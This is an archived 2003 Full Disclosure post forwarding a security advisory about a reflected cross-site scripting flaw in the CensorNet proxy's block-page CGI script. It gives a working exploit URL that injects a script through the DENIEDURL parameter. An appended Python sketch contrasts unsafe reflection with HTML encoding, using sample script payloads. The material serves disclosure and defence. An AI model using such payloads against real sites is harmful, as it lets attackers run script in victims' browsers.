Full Disclosure mailing list archives

Fw: CensorNet: Cross Site Scripting Vulnerability


From: "Richard Maudsley" <r_i_c_h_lists () btopenworld com>
Date: Thu, 23 Oct 2003 18:49:02 +0100


----- Original Message ----- 
From: "Richard Maudsley" <maudr001 () rbwm org>
To: <bugtraq () securityfocus com>; <support () adelix com>; <wrigd006 () rbwm org>;
<frenw001 () rbwm org>
Sent: Wednesday, October 22, 2003 12:51 PM
Subject: CensorNet: Cross Site Scripting Vulnerability


Hello,

A cross site scripting vulnerability exists in the CensorNet Proxy Service
(www.censornet.com) that allows scripting (and HTML) to be passed to the
CGI script and displayed in the web browser.

Exploit:
http://SERVER/cgi-bin/dansguardian.pl?DENIEDURL=</a><script>alert('Counter-Strike__servers__from__£10_per_month!');window.open("http://www.socketx.co.uk")</script>

Regards,
Richard Maudsley


- -------------------------------------------------------------------
    This email has been sent from the Royal Borough of Windsor and
Maidenhead LEA system, if you have cause for complaint regarding the
       content of this email please contact abuse () rbwm org
- -------------------------------------------------------------------
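
Added example, not part of the original message and not CensorNet's code: a Python sketch of a block page that reflects DENIEDURL verbatim, next to a version that encodes it for the HTML context. The page template, the function names and the sample query strings are assumptions made for illustration; the advisory only shows that the value is echoed into the page.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Assumed template: the denied URL is shown as both link target and link text.
TEMPLATE = '<p>Access denied: <a href="{href}">{text}</a></p>'
ALLOWED_SCHEMES = {"http", "https", "ftp"}


def denied_url(query_string):
    """Return the decoded DENIEDURL parameter, or '' if it is absent."""
    return parse_qs(query_string, keep_blank_values=True).get("DENIEDURL", [""])[0]


def linkable(value):
    """True only for URLs with a scheme the block page should link to."""
    try:
        return urlsplit(value).scheme.lower() in ALLOWED_SCHEMES
    except ValueError:          # malformed input such as "http://["
        return False


def render_unsafe(query_string):
    """Reflects the parameter verbatim: markup in it becomes part of the page."""
    value = denied_url(query_string)
    return TEMPLATE.format(href=value, text=value)


def render_safe(query_string):
    """Entity-encode the value and link only to expected URL schemes."""
    value = denied_url(query_string)
    text = html.escape(value, quote=True)    # & < > " ' become entities
    if linkable(value):
        return TEMPLATE.format(href=text, text=text)
    # An escaped javascript: or data: URL is still active inside href,
    # so anything unexpected is printed as plain text only.
    return "<p>Access denied: {}</p>".format(text)


# Constructed sample inputs (marker values, not taken from the advisory)
MARKUP = "DENIEDURL=%3C/a%3E%3Cscript%3Ealert(1)%3C/script%3E"
SCRIPT_URL = "DENIEDURL=javascript:alert(1)"
NORMAL = "DENIEDURL=http://example.com/page%3Fa=1%26b=2"

if __name__ == "__main__":
    for qs in (MARKUP, SCRIPT_URL, NORMAL):
        print("unsafe:", render_unsafe(qs))
        print("safe:  ", render_safe(qs))
```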
